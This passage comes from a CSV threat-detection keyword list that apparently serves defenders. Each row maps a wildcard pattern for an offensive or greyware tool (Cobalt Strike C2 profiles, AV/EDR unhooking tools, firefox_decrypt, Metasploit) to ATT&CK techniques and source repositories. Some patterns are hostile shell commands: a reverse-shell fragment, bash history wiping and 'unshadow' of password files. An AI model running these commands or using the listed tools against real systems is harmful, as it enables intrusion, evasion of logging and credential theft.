teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*UMJjAiNUUtvNww0lBj9tzWegwphuIn6hNP9eeIDfOrcHJ3nozYFPT-Jl7WsmbmjZnQXUesoJkcJkpdYEdqgQFE6QZgjWVsLSSDonL28DYDVJ*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*UmVmbGVjdGl2ZSBETEwgaW5qZWN0aW9u*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*UmVmbGVjdGl2ZSBETEwgT1NTIEJ1Y2tldA==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*UmVmbGVjdGl2ZSBETEwgUGF0aA==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*UmVmbGVjdGl2ZSBETEwgVVJJ*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*UmVmbGVjdGl2ZSBJbmplY3QgUHJvY2VzcyBJZA==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Un1k0d3r/SCShell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*uname -a* w* id* /bin/bash -i*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*uname=FUZZ&pass=FUZZ*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*Unblock-File .\install.ps1*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*Unconstrained_Delegation_Systems.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Und3rf10w*","offensive_tool_keyword","Github Username","github repo hosting offensive tools and exploitation frameworks","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Und3rf10w","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*unDefender-master*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" +"*undertheradar-main*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*unexpected bytes remain after decoding*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*unexpected internal error*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*unhide-implant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*unhook kernel32*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" +"*unhook wldp amsi*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" +"*UnhookingKnownDlls.*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" +"*UnhookingNtdll_disk.*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" +"*UnhookingPatch-main*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*UniByAv*","offensive_tool_keyword","UniByAv","UniByAv is a simple obfuscator that take raw shellcode and generate executable that are Anti-Virus friendly. The obfuscation routine is purely writtend in assembly to remain pretty short and efficient. In a nutshell the application generate a 32 bits xor key and brute force the key at run time then perform the decryption of the actually shellcode.","T1027 - T1059 - T1029","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/UniByAv","1","1","N/A","N/A","3","239","67","2018-10-26T15:25:26Z","2017-08-15T21:57:15Z" +"*unicorn.py *","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" +"*unicorn-master.zip*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" +"*unixpickle*","offensive_tool_keyword","Github Username","github repo hosting obfuscation tools","N/A","N/A","N/A","N/A","Defense Evasion","https://github.com/unixpickle","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*unknown or unsupported key type*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*unkvolism/Fuck-Etw*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*unmanagedPowershell */command*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*unmarshal_cmd_exec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*UnmarshalPwn.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*UnmarshalPwn.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*unode/firefox_decrypt*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1624","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z" +"*UnquotedPath.csproj*","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*UnquotedPath.exe*","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE*","greyware_tool_keyword","unset","disable history logging","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*unset HISTFILE*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*unset HISTFILE*","greyware_tool_keyword","unset","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*unshackle --*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*unshackle-main*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*unshackle-v1.0.iso*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*unshadow /etc/passwd*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*unshadow passwd shadow > *","greyware_tool_keyword","unshadow","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*unshadow passwd shadow*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*untested_payloads.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*UnwindInspector.exe*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" +"*Update-ExeFunctions*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - 